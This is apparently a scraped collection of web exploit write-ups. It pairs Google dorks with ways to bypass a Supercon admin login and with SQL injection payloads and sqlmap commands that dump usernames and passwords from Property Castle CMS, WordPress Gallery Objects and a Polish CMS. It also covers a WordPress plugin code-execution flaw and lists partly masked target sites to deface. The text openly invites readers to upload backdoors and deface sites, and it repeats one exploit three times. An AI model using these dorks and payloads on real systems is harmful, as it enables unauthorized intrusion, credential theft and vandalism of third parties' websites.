Exploits

Exploit Title: Supercon Direct login to admin panel without entering password
Google Dork : inurl:/webadmin/login.php intext:“Supercon Infoservices”
Product Description
——————-
Supercon delivers high quality, reliable and cost-effective IT services to customers globally.
We provide world-class technology services by constantly exploring and implementing innovative
solutions that drive long-term value to our customers. We have been providing solutions to clients
across the globe for more than 5 years and boast of our extensive
experience on website designing and development projects.

Vulnerability Details
———————
First type the dork [inurl:/webadmin/login.php intext:“Supercon Infoservices”]
Then after find the site in which their is written Copyright © [Version] Supercon Infoservices(P) Ltd. in the footer
Now, go to it’s admin page http://www.targetsite.com/webadmin/login.php
After opening the admin panel . Follow this link http://www.targetsite.com/webadmin/manage-gallery.php

And voila you will be directly login into the admin panel and you can also upload your backdoor and deface :) . 

Exploit Title: Wordpress Better-wp-security Plugin Remote Code Execution

Google Dork : inurl:wp-content/plugins/better-wp-security
Location : http://site.com/wp-content/plugins/better-wp-security/better-wp-security.php
Vulnerability is also triggered in: http://site.com/wp-content/plugins/better-wp-security/core/class-itsec-core.php
public function admin_tooltip_ajax() {

global $itsec_globals;

if ( ! isset( $_POST['nonce'] ) || ! wp_verify_nonce(
sanitize_text_field( $_POST['nonce'] ), 'itsec_tooltip_nonce' ) ) {
die ();
}

if ( sanitize_text_field( $_POST['module'] ) == 'close' ) {

$data = $itsec_globals['data'];
$data['tooltips_dismissed'] = true;
update_site_option( 'itsec_data', $data );

} else {

call_user_func_array( $this->tooltip_modules[ sanitize_text_field(
$_POST['module'] ) ]['callback'], array() );

}

die(); // this is required to return a proper result

}

Exploit Title: Property Castle CMS post SQL injection

Google Dork: inurl:“/cms/cms.php?link_id=”
1-get database name : http://URL/file.php?link_id=4%27+and+updatexml(null,/*!50000concat*/(0x3a3a,database()),null)–+
we will have database name 
2- we search “contact us” page
3- we use “http header” to get data names (all post data are injectable , i will use the first in this example)
4- we use sqlmap tool now and inject it with POST method
EXAMPLE : [ sqlmap –url “http://website/user/controller/valuation/valuation-controller.php” –data “name=aaa&contact_no=200131154&email_id=aaaa%40aa.com&postcode=1561&return_page=%2Fproperties%2Fcms%2Fcms.php” -p name -D [database_name] -T login -C username,password –dump ]
#admin page: http://website/admin/index.php 

 Exploit Title: Property Castle CMS post SQL injection
 Google Dork: inurl:“/cms/cms.php?link_id=”
 1-get database name : http://URL/file.php?link_id=4%27+and+updatexml(null,/*!50000concat*/(0x3a3a,database()),null)–+
we will have database name 
2- we search “contact us” page
3- we use “http header” to get data names (all post data are injectable , i will use the first in this example)
4- we use sqlmap tool now and inject it with POST method
EXAMPLE : [ sqlmap –url “http://website/user/controller/valuation/valuation-controller.php” –data “name=aaa&contact_no=200131154&email_id=aaaa%40aa.com&postcode=1561&return_page=%2Fproperties%2Fcms%2Fcms.php” -p name -D [database_name] -T login -C username,password –dump ]
#admin page: http://website/admin/index.php 

Exploit Title: Property Castle CMS post SQL injection
Google Dork: inurl:“/cms/cms.php?link_id=”
1-get database name : http://URL/file.php?link_id=4%27+and+updatexml(null,/*!50000concat*/(0x3a3a,database()),null)–+
we will have database name 
2- we search “contact us” page
3- we use “http header” to get data names (all post data are injectable , i will use the first in this example)
4- we use sqlmap tool now and inject it with POST method
EXAMPLE : [ sqlmap –url “http://website/user/controller/valuation/valuation-controller.php” –data “name=aaa&contact_no=200131154&email_id=aaaa%40aa.com&postcode=1561&return_page=%2Fproperties%2Fcms%2Fcms.php” -p name -D [database_name] -T login -C username,password –dump ]
#admin page: http://website/admin/index.php 

Exploit Title : WordPress Gallery Objects 0.4 SQL Injection
Dork Google: inurl:/admin-ajax.php?action=go_view_object   
######################


Poc via Browser:

http://VICTIM/wp-admin/admin-ajax.php?action=go_view_object&viewid=1[ and 1=2]&type=html


sqlmap:

sqlmap -u "http://VICTIM/wp-admin/admin-ajax.php?action=go_view_object&viewid=1&type=html" -p viewid

---
Place: GET
Parameter: viewid
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: action=go_view_object&viewid=475 AND 7403=7403&type=html
---


#####################

Polish CMS - SQL Injection
{-} Vulnerable Versions => All Versions So Far.

{x} Google Dork:: 1 => inurl:index.php?op=galeria id= site:pl
{x} Google Dork:: 2 => inurl:new/index.php?op=galeria id= site:pl
——————————————————————————————————————————–

File:
index.php {HomePage}

Vulnerable Parameters:
[id] , [j] , [s] , [lang]

Administration Panel:
/admin/

Exploit Title: PRIVATE CSR
Google Dork : inurl:/“config/config.izo”
# Priv8 SCR Editors
#
#######################################################
# Use Editors To Edit Config Files And Deafce The Site Via CSR Editors.
#######################################################
#
# [+] Example:
#http://lom-radioX.com/config/config.izo
#http://kesbangpolbuXlukumba.info/config/config.izo
#http://www.mirgosXtinits.ru/config/config.izo
#http://sacredodysXsey.com/config/config.izo
#http://www.biohXgienica.com/config/config.izo
#######################################################
# [+] Deface Page: www.site.com/config/tar.tmp
#######################################################